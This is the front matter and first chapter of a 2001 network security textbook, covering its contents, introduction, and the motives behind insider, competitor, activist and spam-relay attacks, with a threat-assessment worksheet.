{ "pages": [ { "page_number": 1, "text": " \n \n \n \nrelease TeamOR 2001 \n[x] web.security \n \n \n \n \n \n \n" }, { "page_number": 2, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 2\nTable of Contents \n Active Defense — A Comprehensive Guide to Network Security - 4\n \n Introduction - 6\n \n Chapter 1 - Why Secure Your Network? - 8 \n Chapter 2 - How Much Security Do You Need? - 14 \n Chapter 3 - Understanding How Network Systems Communicate - 27 \n Chapter 4 - Topology Security - 62 \n Chapter 5 - Firewalls - 81 \n Chapter 6 - Configuring Cisco Router Security Features - 116 \n Chapter 7 - Check Point’s FireWall-1 - 143 \n Chapter 8 - Intrusion Detection Systems - 168 \n Chapter 9 - Authentication and Encryption - 187 \n Chapter 10 - Virtual Private Networking - 202 \n Chapter 11 - Viruses, Trojans, and Worms: Oh My! - 218 \n Chapter 12 - Disaster Prevention and Recovery - 233 \n Chapter 13 - NetWare - 256 \n Chapter 14 - NT and Windows 2000 - 273 \n Chapter 15 - UNIX - 309 \n Chapter 16 - The Anatomy of an Attack - 334 \n Chapter 17 - Staying Ahead of Attacks - 352 \n Appendix A - About the CD-ROM - 366 \n Appendix B - Sample Network Usage Policy - 367 \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n" }, { "page_number": 3, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 3\nSynopsis by Barry Nance \nIn one book, Brenton and Hunt deal with all the major issues you face when you want to make your network \nsecure. The authors explain the need for security, identify the various security risks, show how to design a \nsecurity policy and illustrate the problems poor security can allow to happen. Paying individual attention to \nNetWare, Windows and Unix environments, they describe how networks operate, and the authors discuss \nnetwork cables, protocols, routers, bridges, hubs and switches from a security perspective. Brenton and \nHunt explore security tools such as firewalls, Cisco router configuration settings, intrusion detection systems, \nauthentication and encryption software, Virtual Private Networks (VPNs), viruses, trojans and worms. \nBack Cover \n• \nDevelop a Systematic Approach to Network Security \n• \nLimit Your Exposure to Viruses and Minimize Damage When They \nStrike \n• \nChoose a Firewall and Configure It to Serve Your Exact Needs \n• \nMonitor Your Network and React Effectively to Hackers \nGet the Know-How To Optimize Today's Leading Security Technologies \nToday's networks incorporate more security features than ever before, yet \nhacking grows more common and more severe. Technology alone is not the \nanswer. You need the knowledge to select and deploy the technology \neffectively, and the guidance of experts to develop a comprehensive plan that \nkeeps your organization two steps ahead of mischief and thievery. Active \nDefense: A Comprehensive Guide to Network Security gives you precisely the \nknowledge and expertise you're looking for. You'll work smarter by day, and \nsleep easier by night. 
Coverage includes:

• Configuring Cisco router security features
• Selecting and configuring a firewall
• Configuring an Intrusion Detection System
• Providing data redundancy
• Configuring a Virtual Private Network
• Recognizing hacker attacks
• Getting up-to-date security information
• Locking down Windows NT and 2000 servers
• Securing UNIX, Linux, and FreeBSD systems
• Protecting NetWare servers from attack

About the Authors

Chris Brenton is a network consultant specializing in network security and multiprotocol environments. He is the author of several Sybex books, including Mastering Cisco Routers.

Cameron Hunt is a network professional specializing in information security. He has worked for the U.S. military and a wide range of corporations. He currently serves as a trainer and consultant.

Active Defense — A Comprehensive Guide to Network Security

Overview

Chris Brenton
with Cameron Hunt

Associate Publisher: Richard J. Staron
Contracts and Licensing Manager: Kristine O'Callaghan
Acquisitions and Developmental Editor: Maureen Adams
Editor: Colleen Wheeler Strand
Production Editor: Elizabeth Campbell
Technical Editor: Scott Warmbrand
Book Designer: Kris Warrenburg
Graphic Illustrator: Tony Jonick
Electronic Publishing Specialist: Maureen Forys, Happenstance Type-O-Rama
Proofreaders: Nanette Duffy, Emily Hsuan, Nelson Kim, Laurie O'Connell, Nancy Riddiough
Indexer: Rebecca Plunkett
CD Coordinator: Christine Harris
CD Technician: Kevin Ly
Cover Designer: Richard Miller, Calyx Design
Cover Illustrator: Richard Miller, Calyx Design

Copyright © 2001 SYBEX Inc., 1151 Marina Village Parkway, Alameda, CA 94501. World rights reserved. No part of this publication may be stored in a retrieval system, transmitted, or reproduced in any way, including but not limited to photocopy, photograph, magnetic, or other record, without the prior agreement and written permission of the publisher.

An earlier version of this book was published under the title Mastering Network Security © 1999 SYBEX Inc.

Library of Congress Card Number: 2001088118

ISBN: 0-7821-2916-1

SYBEX and the SYBEX logo are either registered trademarks or trademarks of SYBEX Inc. in the United States and/or other countries. Mastering is a trademark of SYBEX Inc.

Screen reproductions produced with FullShot 99. FullShot 99 © 1991–1999 Inbit Incorporated. All rights reserved. FullShot is a trademark of Inbit Incorporated.

The CD interface was created using Macromedia Director, copyright 1994, 1997–1999 Macromedia Inc. For more information on Macromedia and Macromedia Director, visit http://www.macromedia.com.

TRADEMARKS: SYBEX has attempted throughout this book to distinguish proprietary trademarks from descriptive terms by following the capitalization style used by the manufacturer.

The author and publisher have made their best efforts to prepare this book, and the content is based upon final release software whenever possible. Portions of the manuscript may be based upon pre-release versions supplied by software manufacturer(s).
The author and the publisher make no representations or warranties of any kind with regard to the completeness or accuracy of the contents herein and accept no liability of any kind, including but not limited to performance, merchantability, fitness for any particular purpose, or any losses or damages of any kind caused or alleged to be caused directly or indirectly by this book.

Manufactured in the United States of America

10 9 8 7 6 5 4 3 2 1

This book is dedicated to my son, Skylar Griffin Brenton. May the joy you have brought into my life be returned to you threefold.
—Chris Brenton

This book is dedicated to security professionals everywhere—only the truly paranoid know peace!
—Cameron Hunt

Acknowledgments

I would like to thank all the Sybex people who took part in pulling this book together. This includes Guy Hart-Davis (a.k.a. "The Text Butcher") for getting me started on the right track. Yet again I owe you a bottle of home-brewed mead. I also want to say thank you to Maureen Adams for kicking in on the initial development and CD-ROM work. I also wish to thank my technical editor, Jim Polizzi, whose up-front and challenging style helped to keep me on my toes.

I also wish to thank a few people over at Alpine Computers in Holliston, Mass., for giving input, making suggestions, and just being a cool crew. This includes Cheryl "I Was the Evil Queen but Now I'm Just the Witch Who Lives in the Basement" Gordon for her years of experience and mentoring. Thanks to Chuckles Ahern, Dana Gelinas, Gene Garceau, Phil Sointu, Ron Hallam, Gerry Fowley, the guys in the ARMOC, Bob Sowers, Steve Howard, Alice Peal, and all the members of the firewall and security group for keeping me challenged technically (or technically challenged, whichever the case may be).

On a more personal note, I would like to thank Sean Tangney, Deb Tuttle, Al "That Was Me behind You with the BFG" Goodniss, Maria Goodniss, Chris Tuttle, Toby Miller, Lynn Catterson, and all the Babylonian honeys for being such an excellent group of friends. Thanks to Morgan Stern, who is one of the smartest computer geeks I know and is more than happy to share his knowledge with anyone who asks. Thanks also to Fred Tuttle for being a cool old-time Vermonter and for showing that people can still run for political office and keep a sense of humor.

I also wish to thank my parents, Albert and Carolee, as well as my sister Kym. The happiness I have today comes from the love, guidance, and nurturing I have received from you over many years. I could not have wished for a better group of people to call my family.

Finally, I would like to thank my wonderful wife and soul mate Andrea for being the best thing ever to walk into my life. My life would not be complete without you in it, and this book would not have been possible without your support. Thank you for making me the luckiest man alive.
—Chris Brenton

I'd like to thank my friends for their patience, my family for their tolerance, and of course, Nikka, whose knowledge of all my vices and vulnerabilities allowed her to use an astonishing array of incentives to force my timely completion of this book.

I owe an incredible debt to the many security professionals—who have shared their nuanced understanding of current security technologies and the issues surrounding their use—in the preparation of this book. This revision is as much yours as mine.
I owe Jill Schlessinger a tremendous debt for giving me this opportunity in the first place. She patiently listened to my radical revision plan, ignored it, and forced me to follow common sense. She was right all along. Maureen Adams accomplished institutional miracles, while Elizabeth Campbell and Colleen Strand employed the most ingenious good cop-bad cop routine to keep me properly motivated and, more importantly, on schedule! Thank you, ladies, the pleasure has been all mine!
—Cameron Hunt

Introduction

Overview

Some of us can remember a time when securing a network environment was a far easier task than it seems to be today. As long as every user had a password and the correct levels of file permissions had been set, we could go to sleep at night confident that our network environment was relatively secure. This confidence may or may not have been justified, but at least we felt secure.

Then along came the Internet and everything changed. The Internet has dramatically accelerated the pace at which information is disseminated. In the early 1990s, most of us would not hear about a security vulnerability unless it made it into a major magazine or newspaper. Even then, the news release typically applied to an old version of software that most of us no longer used anyway. These days, hundreds of thousands of people can be made privy to the details of a specific vulnerability in less than an hour.

This is not to say that all this discussion of product vulnerabilities is a bad thing. Actually, quite the opposite is true. Individuals with malicious intent have always had places to exchange ideas. Pirate bulletin boards have been around since the 1980s. Typically, it was the rest of us who were left out in the cold, with no means of dispersing this information to the people who needed it most: the network administrators attempting to maintain a secure environment. The Internet has become an excellent means to get vulnerability information into the hands of the people responsible for securing their environments.

Increased awareness also brings increased responsibility. This is not only true for the software company that is expected to fix the vulnerability; it is also true for the network administrator or security specialist who is expected to deploy the fix. Any end user with a subscription to a mailing list can find out about vulnerabilities as quickly as the networking staff. This greatly increases the urgency of deploying security-related fixes as soon as they are developed. (As if we didn't have enough on our plates already!)

So, along with all of our other responsibilities, we need to maintain a good security posture. The first problem is where to begin. Should you purchase a book on firewalls or on securing your network servers? Maybe you need to learn more about network communications in order to understand how these vulnerabilities can even exist. Should you be worried about running backups or redundant servers?

One lesson that has been driven home since the publication of the first edition of this book is the need to view security not as a static package, but rather as a constant process incorporating all facets of networking and information technology. You cannot focus on one single aspect of your network and expect your environment to remain secure.
Nor can this process be done in isolation from other networking activities. This book provides system and network administrators with the information they will need to run a network with multiple layers of security protection, while considering issues of usability, privacy, and manageability.

What This Book Covers

Chapter 1 starts you off with a look at why someone might attack an organization's network resources. You will learn about the different kinds of attacks and what an attacker stands to gain by launching them. At the end of the chapter, you'll find a worksheet to help you gauge the level of potential threat to your network.

Chapter 2 introduces risk analysis and security policies. The purpose of a risk analysis is to quantify the level of security your network environment requires. A security policy defines your organization's approach to maintaining a secure environment. These two documents create the foundation you will use when selecting and implementing security precautions.

In Chapter 3, you'll get an overview of how systems communicate across a network. The chapter looks at how information is packaged and describes the use of protocols. You'll read about vulnerabilities in routing protocols and which protocols help to create the most secure environment. Finally, the chapter covers services such as FTP, HTTP, and SMTP, with tips on how to use them securely.

Chapter 4 gets into topology security. In this chapter, you'll learn about the security strengths and weaknesses of different types of wiring, as well as different types of logical topologies, such as Ethernet and Frame Relay. Finally, you'll look at different types of networking hardware, such as switches, routers, and layer-3 switching, to see how these devices can be used to maintain a more secure environment.

Chapter 5 discusses perimeter security devices such as packet filters and firewalls. You will create an access control policy (based on the security policy created in Chapter 2) and examine the strengths and weaknesses of different firewalling methods. Also included are some helpful tables for developing your access control policy, such as a description of all of the TCP flags as well as descriptions of the ICMP type codes.

In Chapter 6, we'll discuss creating access control lists on a Cisco router. The chapter begins with securing the Cisco router itself and then goes on to describe both standard and extended access lists. You'll see what can and cannot be blocked using packet filters and take a look at a number of access list samples. The end of the chapter looks at Cisco's new reflexive filtering, which allows the router to act as a dynamic packet filter.

You'll see how to deploy a firewall in your environment in Chapter 7. Specifically, you'll walk through the setup and configuration of Check Point's FireWall-1: securing the underlying operating system, installing the software, and implementing an access control policy.

Chapter 8 discusses intrusion detection systems (IDS). You'll look at the traffic patterns an IDS can monitor, as well as some of the technology's limitations. As a specific IDS example, you will take a look at Internet Security Systems' RealSecure. This includes operating system preparation, software installation, and how to configure RealSecure to check for specific types of vulnerabilities.
Chapter 9 looks at authentication and encryption. You will learn why strong authentication is important and what kinds of attacks exploit weak authentication methods. You'll also read about different kinds of encryption and how to select the right algorithm and key size for your encryption needs.

Read Chapter 10 to learn about virtual private networking (VPN), including when the deployment of a VPN makes sense and what options are available for deployment. As a specific example, you will see how to use two FireWall-1 firewalls to create a VPN. You will also see before and after traces, so you will know exactly what a VPN does to your data stream.

Chapter 11 discusses viruses, Trojan horses, and worms. This chapter illustrates the differences between these applications and shows exactly what they can and cannot do to your systems. You will see different methods of protection and some design examples for deploying prevention software.

Chapter 12 is all about disaster prevention and recovery, peeling away the different layers of your network to see where disasters can occur. The discussion starts with network cabling and works its way inside your network servers. You'll even look at creating redundant links for your WAN. The chapter ends by discussing the setup and use of Qualix Group's clustering product, OctopusHA+.

Novell's NetWare operating system is featured in Chapter 13. In this chapter, you'll learn about ways to secure a NetWare environment through user account settings, file permissions, and NDS design. We'll discuss the auditing features that are available with the operating system. Finally, you'll look at what vulnerabilities exist in NetWare and how you can work around them.

Chapter 14 discusses Microsoft Windows networking technologies, specifically NT Server and Windows 2000 Server. You'll look at designing a domain structure that will enhance your security posture, as well as how to use policies. We'll discuss working with user accounts, logging, and file permissions, as well as some of the password insecurities in Windows NT/2000. Finally, you'll read about the IP services available with NT and some of the security caveats in deploying them.

Chapter 15 is all about UNIX (and the UNIX clones, Linux and FreeBSD). Specifically, you'll see how to lock down a system running the Linux operating system. You'll look at user accounts, file permissions, and IP services. This chapter includes a detailed description of how to rebuild the operating system kernel to enhance security even further.

Ever wonder how an evil villain might go about attacking your network resources? Read Chapter 16, which discusses how attackers collect information, how they may go about probing for vulnerabilities, and what types of exploits are available. You'll also look at some of the canned software tools that are available to attackers.

Chapter 17 shows you how you can stay informed about security vulnerabilities. This chapter describes the information available from both product vendors and a number of third-party resources. Vulnerability databases, Web sites, and mailing lists are discussed. Finally, the chapter ends with a look at auditing your environment using Kane Security Analyst, a tool that helps you to verify that all of your systems are in compliance with your security policy.
Who Should Read This Book

This book is specifically geared toward the individual who does not have ten years of experience in the security field—but is still expected to run a tight ship. If you are a security guru who is looking to fill in that last five percent of your knowledge base, this may not be the book for you.

If, however, you are looking for a practical guide that will help you to identify your areas of greatest weakness, you have come to the right place. This book was written with the typical network or system administrator in mind: an administrator who has a pretty good handle on networking and the servers he or she is expected to manage, but who needs to find out what can be done to avoid being victimized by a security breach.

Network security would be a far easier task if we could all afford to bring in a $350-per-hour security wizard to audit and fix our computer environment. For most of us, however, this is well beyond our budget constraints. A strong security posture does not have to be expensive—but it does take time and attention to detail. The more holes you can patch within your networking environment, the harder it will be for someone to ruin your day by launching a network-based attack.

If you have any questions or comments regarding any of the material in this book, feel free to e-mail us at cbrenton@sover.net or cam@cameronhunt.com.

Chapter 1: Why Secure Your Network?

You only have to look at the daily newspaper to see that computer-based attacks are on the rise. Nearly every day, we hear that systems run by government and private organizations have been disrupted or penetrated. Even high-profile entities like the U.S. military and Microsoft have been hacked. You might wonder what you can do to protect your company, when organizations like these can fall prey to attack.

To make matters worse, not all attacks are well publicized. While attacks against the FBI may make the front page, many lower-profile attacks never even reach the public eye. Revealing to the public that a company has had its financial information or latest product designs stolen can cause serious economic harm. For example, consider what would happen if a bank announced that its computer security had been breached and a large sum of money stolen. If you had accounts with this bank, what would you do? Clearly, the bank would want to keep this incident quiet.

Finally, there may well be a large number of attacks that go completely undocumented. The most common are insider attacks: in such cases, an organization may not wish to push the issue beyond terminating the employee. For example, a well-known museum once asked me to evaluate its current network setup. The museum director suspected that the networking staff may have been involved in some underhanded activities.

I found that the networking staff had infiltrated every user's mailbox (including the director's), the payroll database, and the contributors' database. They were also using the museum's resources to run their own business and to distribute software tools that could be used to attack other networks. Despite all these infractions, the museum chose to terminate the employees without pursuing any legal action. Once terminated, these ex-employees attempted to utilize a number of "back doors" that they had set up for themselves into the network.
Even in light of this continued activity, the museum still chose not to pursue criminal charges, because it did not wish to make the incident public.

There are no clear statistics on how many security incidents go undocumented. My own experience suggests that most, in fact, are not documented. Clearly, security breaches are on the rise, and every network needs strategies to prevent attack.

Tip: You can report security intrusions to the Computer Emergency Response Team (CERT) Coordination Center at cert@cert.org. CERT issues security bulletins and can also facilitate the release of required vendor patches.

Before we get into the meat of how to best secure your environment, we need to do a little homework. To start, we will look at who might attack your network—and why.

Thinking Like an Attacker

In order to determine how to best guard your resources, you must identify who would want to disrupt them. Most attacks are not random; the person staging the attack usually believes there is something to gain by disrupting your assets. For example, a crook is more likely to rob someone who appears wealthy, because the appearance of wealth suggests larger financial gain. Identifying who stands to gain from stealing or disrupting your resources is the first step toward protecting them.

Attacker, Hacker, and Cracker

People, from trade magazine writers to Hollywood moviemakers, often use the words attacker, hacker, and cracker interchangeably. The phrase "we got hacked" has come to mean "we were attacked."

However, there are some strong distinctions between the three terms, and understanding the differences will help you to understand who is trying to help reinforce your security posture—and who is trying to infiltrate it. An attacker is someone who looks to steal or disrupt your assets. An attacker may be technically adept or a rank amateur; an attacker best resembles a spy or a crook.

The original meaning of hacker was someone with a deep understanding of computers and/or networking. Hackers are not satisfied with simply executing a program; they need to understand all the nuances of how it works. A hacker is someone who feels the need to go beyond the obvious. The art of hacking can be either positive or negative, depending on the personalities and motivations involved.

Hacking has become its own subculture, with its own language and accepted social practices. It is probably human nature that motivates people outside of this subculture to identify hackers as attackers or even anarchists. In my opinion, however, hackers are more like revolutionaries.

History teems with individuals whose motivation was beyond the understanding of the mainstream culture of their time. Da Vinci, Galileo, Byron, Mozart, Tesla—all were considered quite odd and out of step with the accepted social norm. In the information age, this revolutionary role is being filled by the individuals we call hackers.

Hackers tend not to take statements at face value. For example, when a vendor claims, "Our product is 100 percent secure," a hacker may take this statement as a personal challenge. What a hacker chooses to do with the information uncovered, however, is what determines what color hat a particular hacker wears.
To distinguish between hackers who are simply attempting to further their understanding of an information system and those who use that knowledge to illegally or unethically penetrate systems, some in the computer industry use the term cracker to refer to the latter. This was an attempt to preserve the traditional meaning of the term "hacker," but the effort has mostly been unsuccessful, although publications occasionally still use the term. The law, however, does not recognize the difference in intent, only the similar behavior of unauthorized system penetration.

White Hat, Grey Hat, and Black Hat Hackers

A hacker who finds a method of exploiting a security loophole in a program, and who tries to publish or make known the vulnerability, is called a white hat hacker. If, however, a hacker finds a security loophole and chooses to use it against unsuspecting victims for personal gain, that hacker wears a black hat. A grey hat hacker is someone who is a "white hat by day, black hat by night"—in other words, a hacker who is employed as a legitimate security consultant but continues illegal activity on his or her own time.

Let's look at an example of someone who might be considered a grey hat. Imagine Jane, a security consultant who finds an insecure back door to an operating system. Although Jane does not use the exploit to attack unsuspecting victims, she does charge a healthy fee to secure her clients' systems against this attack. In other words, Jane is not exploiting the deficiency per se, but she is using it for her own personal gain. In effect, she is extorting money from organizations in order to prevent them from being left vulnerable. Jane does not work with the manufacturer toward creating a public fix for this problem, because it is clearly in her best interest to ensure that the manufacturer does not release a free patch.

To cloud the issue even further, many people mistake the motivation of those who post the details of known bugs to public forums. People often assume that these individuals are announcing such vulnerabilities in order to educate other attackers. This could not be further from the truth—releasing vulnerability information to the public alerts vendors and system administrators to a problem and the need to address it. Many times, publicly announcing a vulnerability is done out of frustration or necessity.

For example, back when the Pentium was the newest Intel chip in town, users found a bug that caused computation errors in the math coprocessor portion of the chip. When this problem was first discovered, a number of people did try to contact Intel directly in order to report the problem. I spoke with a few, and all stated that their claims were met with denial or indifference.

It was not until details of the bug were broadcast throughout the Internet and discussed in open forums that Intel took steps to rectify the problem. While Intel did finally stand by its product with a free chip replacement program, people had to air Intel's dirty laundry in public to get the problem fixed. Making bugs and deficiencies public knowledge can be a great way to force a resolution.

Note: It is proper etiquette to inform a product's vendor of a problem first and not make a public announcement until a patch has been created. The general guideline is to give a vendor at least two weeks to create a patch before announcing a vulnerability in a public forum.
Most manufacturers have become quite responsive to this type of reporting. For example, Microsoft will typically issue fixes to security-related problems within a few days of their initial announcement. Once the deficiency is public knowledge, most vendors will want to rectify the problem as quickly as possible.

Public airing of such problems has given some observers the wrong idea. When someone finds a security-related problem and reports it to the community at large, others may think that the reporter is an attacker who is exploiting the security deficiency for personal gain. This openness in discussing security-related issues, however, has led to an increase in software integrity.

Why Would Someone Want to Ruin My Day?

So what motivates a person to stage an attack against your network? As stated, it is extremely rare for these attacks to be random. They almost always require that something be gained by the attack. What provokes the attack depends on your organization and on the individual staging the attack.

Attacks from Within

Case studies have shown that the vast majority of attacks originate from within an organization. In fact, some studies state that as much as 70 percent of all attacks come from someone within an organization or from someone with inside information (such as an ex-employee). While using firewalls to protect assets from external attacks is all the rage, it is still the employees—who have an insider's view of how your network operates—who are responsible for the greatest amount of damage to, or compromise of, your data. This damage can be accidental (as in user error) or, in some cases, intentional.

The most typical cause of a true attack is a disgruntled employee or ex-employee. I once responded to an emergency call from a new client who had completely lost Internet connectivity. Because this was a research firm, Internet access was essential.

Apparently the firm had decided to let an employee "move on to other opportunities," despite the fact that the employee did not wish to leave. Evidently the employee had been quietly asked to pack his personal belongings and leave the building. Being a small organization, the company did not see the need to escort this individual out the door.

On his way out, the former employee made a brief stop at the UNIX system running the company's firewall software. The system was left out in the open and did not use any form of console password. He decided to do a little farewell "housekeeping" and clean up all those pesky program files cluttering up the system. For good measure, he also removed the router's V.34 cable and hid it in a nearby desk. As you can imagine, it cost the organization quite a bit in lost revenue to recover from this disaster. The incident could have been avoided had the equipment been stored in a locked area.

While most administrators take great care in protecting their network from external attacks, they often overlook the greater threat of an internal attack. A person does not even have to be an attacker in order to damage company resources. Sometimes the damage is done out of ignorance.

For example, one company owner insisted on having full supervisor privileges on the company's NetWare server.
While he was not particularly computer literate and did not actually require this level of access, he insisted on it simply because he owned the company.

I'm sure you can guess what happened. While doing some housekeeping on his system, he inadvertently deleted the CCDATA directory on his M: drive. If you have ever administered cc:Mail, you know that this directory is the repository for the postoffice, which contains all mail messages and public folders.

In cc:Mail, the main mail files are almost always open and are difficult to back up by normal means. The company lost all mail messages except for personal folders, which most employees did not use. Approximately two years' worth of data just disappeared. While this was not a willful attack, it certainly cost the company money.

An ever-increasing threat is not the destruction of data, but its theft and compromise. This is usually referred to as industrial (or corporate) espionage. Although not considered as common as internal data destruction, it is still a genuine threat to any organization that has proprietary or confidential information—especially when the compromise of that data would leave the organization legally liable. An example would be any organization involved with health care that falls under the jurisdiction of the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Under the Administrative Simplification provisions of HIPAA, security standards are mandated to protect an individual's health information, while permitting appropriate access and use of that information. Any breach of confidentiality could lead to legal action on behalf of the federal government.

External Attacks

External attacks can come from many diverse sources. While these attacks can still come from disgruntled employees, the range of possible attackers increases dramatically. The only common thread is that usually someone gains by staging the attack.

Competitors

If you are in a highly competitive business, an ambitious competitor may see a benefit in attacking your network. This can take the form of stealing designs or financial statements, or just making your network resources unusable.

The benefit of stealing a competitive design is obvious. Armed with this information, a thieving organization can use your design to shorten its own development time or to equip its own product release with better features. If a competitor knows what products your organization will release in the near future, that competitor can beat you to market with a more attractive product.

The theft of financial information can be just as detrimental. A competitor can gain a complete fiscal overview of your organization—and an unfair advantage in the marketplace. This unfair advantage can come from having an insider's view of your organization's financial health, or just from understanding your sources of income.

For example, I once heard of a computer consulting firm that infiltrated the network of a competitor, stealing a fiscal spreadsheet that showed sources of the company's revenue. The attacker was particularly interested to learn that over 60 percent of revenue came from the sale of fax machines, printers, and copiers. I'm told that this allowed the thieves to walk into a client site and ask:
"Are you sure you want to rely on Company X for your networking needs? They are, after all, primarily an office supply company. Most of their business is from selling faxes and copiers." This tactic won over more than one client.

Sometimes, however, an attacker does not need to remove anything in order to benefit. For example, let's assume that you work for a distribution firm that generates sales through your Web site. You have your catalog online, and customers can place orders using secure forms. For your specific market niche, you have the lowest prices available.

Now, let's assume that I am your largest competitor but that my prices are slightly higher. It would help my business if I could stop your Web site from accepting inbound connections. It would appear to a potential customer that your Web site is offline. Customers who could not reach your Web site might next decide to check out mine instead. Since your site is not available, customers cannot compare prices—and they may go ahead and order the product from my site.

No actual theft has taken place, but this denial of service is now directly responsible for lost revenue. Not only is this type of attack difficult to prove, it can be even more difficult to quantify. If your site is offline for eight hours, how do you know how many sales were lost?

How prone you may be to competitors' attacks relates directly to how competitive your business is. For example, a high school need not worry about a competing school stealing a copy of next year's curriculum. A high school does, however, have a higher than average potential for internal attacks.

Militant Viewpoints

If your business can be considered controversial, you may be prone to threats from others who take a different point of view.

For example, I was once called in by an organization that published information on medical research. The organization's Web site included documentation on abortions. Someone searching the site e-mailed the Webmaster, suggesting that some of the information on the site was not what the company intended. The administrator found that all pages discussing abortion issues had been replaced by pro-life slogans and biblical quotations.

Again, such attacks fall into a gray area. Since no information was stolen, it would be difficult to prosecute the attacker. The most relevant laws at the time would have labeled this attack as graffiti or vandalism.

But times are changing. The high-profile nature of security breaches has made them newsworthy, and activists from around the world are using them to further their own goals. The first type of activist is the truly militant hacker, who carries military or violent conflicts into the cyber world. There are four well-known examples:

• During the spring of 1998, in what many observers saw as saber-rattling, Pakistan and India tested nuclear weapons and engaged in a war of words. Pakistani and Indian hackers each launched an assault on the Web sites that were controlled by the other group.

• Serbian and Albanian hackers penetrated each other's sites during the NATO bombing of Serbia in the spring of 1999.
• Palestinian and Israeli hackers (both groups mostly based in the United States) waged a fierce cyberwar that matched the intense real-world hostility that occurred after an Israeli government official visited a Palestinian holy site in late 2000. Even Ehud Tenebaum, the Israeli hacker known as "The Analyzer," who achieved fame in 1998 as the mastermind of the biggest Pentagon attacks in history, joined the fray.

• At a lower level, Taiwanese and Chinese hackers have attempted to deface and discredit each other in the cyber arena for years—all over which side has legitimate claim to the island of Taiwan.

The other type of activist is usually motivated by something other than greed or violence. Often called "hacktivists," these individuals attack systems with the goal of stopping services, defacing Web sites, or generally drawing attention to their cause. Recent examples include:

• On November 7, 2000 (the day of the Presidential Election in the United States), a hacker penetrated the Republican National Committee page and replaced its text with an endorsement of Vice President Al Gore.

• In June 2000, S11, an Australian group, hijacked Nike.com and sent Nike's intended visitors to S11's anti-Nike site (protesting worker conditions in Nike factories).

• During the World Trade Organization meeting in 1999, the Electrohippies, a group based in Britain, temporarily shut down the WTO's Web site.

High Profile

Organizations that are well known or frequently in the public eye can become subjects of attack simply due to their level of visibility. A would-be attacker may attempt to infiltrate a well-known site with the hope that a successful attack will bring with it some level of notoriety. Examples of high-profile attacks over the past few years include:

• In March 1997, a group called H4G1S compromised one of NASA's Web pages and used it as a forum to warn of future attacks on organizations responsible for commercializing the Internet. The attack had nothing to do with NASA directly—except for providing some high visibility for the group.

• During May of 1999, major U.S. government sites—including Whitehouse.gov, FBI.gov, and Senate.gov—were defaced.

• In February 2000, some of the most high-profile Internet companies suffered from denial-of-service attacks, including Amazon.com, Buy.com, CNN.com, eBay, E*Trade, Yahoo!, and ZDNet.

• Microsoft revealed in late October 2000 that hackers had penetrated its site over a series of weeks. Although Microsoft claimed to have been aware of the hackers from the beginning, it was nonetheless a humbling moment for the organization.

Determining whether or not your organization is high profile can be difficult. Most organizations tend to overestimate their visibility or presence on the Internet. Unless you are part of a multinational organization, or your site counts daily Web hits in the six-figure range, you are probably not a visible enough target to be attacked simply for the notoriety factor.

Bouncing Mail

Arguably the most offensive type of attack is having your domain's mail system used as a spam relay. Spam is unsolicited advertising. Spammers deliver these unsolicited ads in hopes that sheer volume will generate some interest in the product or service advertised. Typically, when a spammer sends an advertisement, it reaches thousands or tens of thousands of e-mail addresses and mailing lists. When a spammer uses your mail system as a spam relay, your mail system becomes the host that tries to deliver all these messages. The result is a denial of service.
While your mail server spends its time processing this spam mail, it is prevented \nfrom handling legitimate inbound and outbound mail for your domain. \nTip \nMost modern mail systems now include anti-spam settings. While these settings will not \nprevent you from receiving spam messages, they will prevent your system from being used \nas a spam relay, by accepting only messages going to or coming from your domain. \nFearing retribution, most spammers would rather use your mail system than their own. The typical spammer will \nattempt to hide the actual return address, so that anyone trying to trace the message assumes that it was delivered \nfrom your domain. \nSpammers go to all this trouble because many Internet users do not appreciate receiving spam mail. “Do not \nappreciate” is an understatement: spam mail can downright infuriate many people, who will take it upon \nthemselves to retaliate by launching a counterattack with mail bombs and denial-of-service attacks. \nSuch counterattacks can quickly produce devastating results for your business. For example, I once consulted for a \nsmall manufacturer of networking products. Shortly after its Internet connection was brought online, one of the \naggressive salespeople got the bright idea of sending out a mass mailing to every mailing list and newsgroup that \nhad even a remote association with computer networking. \nAs you might guess, the mailing generated quite a few responses—but not of the type that the salesperson had \nhoped for. Within hours of the mailing, literally tens of thousands of messages were attempting delivery into the \ndomain. These messages contained quite colorful descriptions of what each sender thought of the advertisement, \nthe company, and its product line. The volume of mail soon caused both the mail server and the mail relay to run \nout of disk space. It became impossible to sort through the thousands of messages to determine which were \nlegitimate and which were part of the attack. As a result, all inbound mail had to be purged and the mail relay shut \ndown for about a week until the attacks subsided. \nWhile this particular attack was due to the shortsightedness of a single employee, external spam routed through \nyour system can create the same headaches and costs. \n \nChapter Worksheet \nIn the sidebar below, you can assess your own network’s current susceptibility to attack. \nAssessing Your Attack Potential \nThe following questions will help you evaluate potential threats to your network. Rate \neach question on a scale of 1 to 5. A 1 signifies that the question does not apply to \nyour organization’s networking environment; a 5 means the question is directly \napplicable. \n1. Is your network physically accessible to the public, such as a library or \ngovernment office? \n2. Is your network accessible by users not employed by your organization, such as a \nschool or university? \n3. Do you offer a public networking service, such as an Internet service provider? \n4. Are there users outside the networking staff who have been granted root or \nadministrator privileges? \n5. Are users allowed to share common logon names such as Guest? \n6. Can your organization’s line of business be considered controversial? \n7. Does a portion of your organization’s business deal with financial or monetary \ninformation? \n8. Is any portion of your network electronically accessible by the public (Web server, \nmail server, and so on)? \n9. 
Chapter Worksheet

In the sidebar below, you can assess your own network's current susceptibility to attack.

Assessing Your Attack Potential

The following questions will help you evaluate potential threats to your network. Rate each question on a scale of 1 to 5. A 1 signifies that the question does not apply to your organization's networking environment; a 5 means the question is directly applicable.

1. Is your network physically accessible to the public, such as a library or government office?
2. Is your network accessible by users not employed by your organization, such as a school or university?
3. Do you offer a public networking service, such as an Internet service provider?
4. Are there users outside the networking staff who have been granted root or administrator privileges?
5. Are users allowed to share common logon names such as Guest?
6. Can your organization's line of business be considered controversial?
7. Does a portion of your organization's business deal with financial or monetary information?
8. Is any portion of your network electronically accessible by the public (Web server, mail server, and so on)?
9. Does your organization produce a product or provide a highly skilled service?
10. Is your organization experiencing aggressive growth?
11. Do news stories about your organization regularly appear in newspapers or trade magazines?
12. Does your organization do business over public networking channels, such as the Internet or frame relay?

For questions 1–6, if your organization scored between 8 and 12, you should take steps to secure your internal network. If your organization scored above 12, you should lock down your internal environment just as aggressively as you would secure your network's perimeter.

